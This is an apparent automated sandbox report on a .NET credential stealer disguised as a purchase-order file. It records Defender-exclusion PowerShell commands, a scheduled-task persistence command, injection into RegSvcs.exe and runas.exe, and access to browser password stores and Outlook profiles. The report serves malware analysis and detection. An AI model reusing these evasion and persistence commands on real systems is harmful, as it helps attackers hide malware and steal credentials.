Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe | Mutant created: \Sessions\1\BaseNamedObjects\pClOCSmehrwiOIZcl
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6040:120:WilError_03
Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7876:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7756:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7812:120:WilError_03
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | File created: C:\Users\user\AppData\Local\Temp\tmp63ED.tmp
Source: Pre Alert PO TVKJEANSA00967.bat.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Pre Alert PO TVKJEANSA00967.bat.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: runas.exe, 00000012.00000003.2248830957.00000000005E1000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000012.00000002.2941572830.00000000005E1000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000012.00000002.2941572830.00000000005BF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: Pre Alert PO TVKJEANSA00967.bat.exe | ReversingLabs: Detection: 55%
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | File read: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe
Source: unknown | Process created: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe "C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe"
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\STiokuWkiGFJ" /XML "C:\Users\user\AppData\Local\Temp\tmp63ED.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: unknown | Process created: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\STiokuWkiGFJ" /XML "C:\Users\user\AppData\Local\Temp\tmp9222.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exe | Process created: C:\Windows\SysWOW64\runas.exe "C:\Windows\SysWOW64\runas.exe"
Source: C:\Windows\SysWOW64\runas.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Section loaded: dwrite.dll
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Section loaded: iconcodecservice.dll
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe | Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe | Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe | Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe | Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe | Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe | Section loaded: iconcodecservice.dll
Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe | Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe | Section loaded: appresolver.dll
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\runas.exe | Section loaded: credui.dll
                      Source: C:\Windows\SysWOW64\runas.exe | Section loaded: netutils.dll
                      Source: C:\Windows\SysWOW64\runas.exe | Section loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\runas.exe | Section loaded: wininet.dll
                      Source: C:\Windows\SysWOW64\runas.exe | Section loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\runas.exe | Section loaded: uxtheme.dll
                      Source: C:\Windows\SysWOW64\runas.exe | Section loaded: ieframe.dll
                      Source: C:\Windows\SysWOW64\runas.exe | Section loaded: iertutil.dll
                      Source: C:\Windows\SysWOW64\runas.exe | Section loaded: netapi32.dll
                      Source: C:\Windows\SysWOW64\runas.exe | Section loaded: version.dll
                      Source: C:\Windows\SysWOW64\runas.exe | Section loaded: userenv.dll
                      Source: C:\Windows\SysWOW64\runas.exe | Section loaded: winhttp.dll
                      Source: C:\Windows\SysWOW64\runas.exe | Section loaded: wkscli.dll
                      Source: C:\Windows\SysWOW64\runas.exe | Section loaded: windows.storage.dll
                      Source: C:\Windows\SysWOW64\runas.exe | Section loaded: wldp.dll
                      Source: C:\Windows\SysWOW64\runas.exe | Section loaded: profapi.dll
                      Source: C:\Windows\SysWOW64\runas.exe | Section loaded: secur32.dll
                      Source: C:\Windows\SysWOW64\runas.exe | Section loaded: mlang.dll
                      Source: C:\Windows\SysWOW64\runas.exe | Section loaded: propsys.dll
                      Source: C:\Windows\SysWOW64\runas.exe | Section loaded: winsqlite3.dll
                      Source: C:\Windows\SysWOW64\runas.exe | Section loaded: vaultcli.dll
                      Source: C:\Windows\SysWOW64\runas.exe | Section loaded: wintypes.dll
                      Source: C:\Windows\SysWOW64\runas.exe | Section loaded: dpapi.dll
                      Source: C:\Windows\SysWOW64\runas.exe | Section loaded: cryptbase.dll
                      Source: C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exe | Section loaded: wininet.dll
                      Source: C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exe | Section loaded: mswsock.dll
                      Source: C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exe | Section loaded: dnsapi.dll
                      Source: C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exe | Section loaded: iphlpapi.dll
                      Source: C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exe | Section loaded: fwpuclnt.dll
                      Source: C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exe | Section loaded: rasadhlp.dll
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                      Source: Window Recorder | Window detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: C:\Windows\SysWOW64\runas.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                      Source: Pre Alert PO TVKJEANSA00967.bat.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: Pre Alert PO TVKJEANSA00967.bat.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Pre Alert PO TVKJEANSA00967.bat.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: runas.pdbGCTL source: RegSvcs.exe, 00000008.00000002.2069389047.00000000010F8000.00000004.00000020.00020000.00000000.sdmp, nhClcdOjQwJ.exe, 00000011.00000002.2942271175.000000000051E000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: nhClcdOjQwJ.exe, 00000011.00000000.1994231473.000000000004E000.00000002.00000001.01000000.0000000D.sdmp, nhClcdOjQwJ.exe, 00000013.00000002.2941482691.000000000004E000.00000002.00000001.01000000.0000000D.sdmp
                      Source: Binary string: RegSvcs.pdb, source: runas.exe, 00000012.00000002.2943817151.0000000004ADC000.00000004.10000000.00040000.00000000.sdmp, runas.exe, 00000012.00000002.2941572830.0000000000567000.00000004.00000020.00020000.00000000.sdmp, nhClcdOjQwJ.exe, 00000013.00000000.2137618964.0000000002E4C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000014.00000002.2364882227.00000000213EC000.00000004.80000000.00040000.00000000.sdmp
                      Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, runas.exe, 00000012.00000003.2069287148.0000000004154000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000012.00000002.2943233572.00000000044B0000.00000040.00001000.00020000.00000000.sdmp, runas.exe, 00000012.00000003.2071135298.0000000004306000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000012.00000002.2943233572.000000000464E000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, runas.exe, runas.exe, 00000012.00000003.2069287148.0000000004154000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000012.00000002.2943233572.00000000044B0000.00000040.00001000.00020000.00000000.sdmp, runas.exe, 00000012.00000003.2071135298.0000000004306000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000012.00000002.2943233572.000000000464E000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: QIoK.pdb source: Pre Alert PO TVKJEANSA00967.bat.exe, STiokuWkiGFJ.exe.0.dr
                      Source: Binary string: RegSvcs.pdb source: runas.exe, 00000012.00000002.2943817151.0000000004ADC000.00000004.10000000.00040000.00000000.sdmp, runas.exe, 00000012.00000002.2941572830.0000000000567000.00000004.00000020.00020000.00000000.sdmp, nhClcdOjQwJ.exe, 00000013.00000000.2137618964.0000000002E4C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000014.00000002.2364882227.00000000213EC000.00000004.80000000.00040000.00000000.sdmp
                      Source: Binary string: QIoK.pdbSHA256 source: Pre Alert PO TVKJEANSA00967.bat.exe, STiokuWkiGFJ.exe.0.dr
                      Source: Binary string: runas.pdb source: RegSvcs.exe, 00000008.00000002.2069389047.00000000010F8000.00000004.00000020.00020000.00000000.sdmp, nhClcdOjQwJ.exe, 00000011.00000002.2942271175.000000000051E000.00000004.00000020.00020000.00000000.sdmp

                      Data Obfuscation

                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.56c0000.4.raw.unpack, id.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
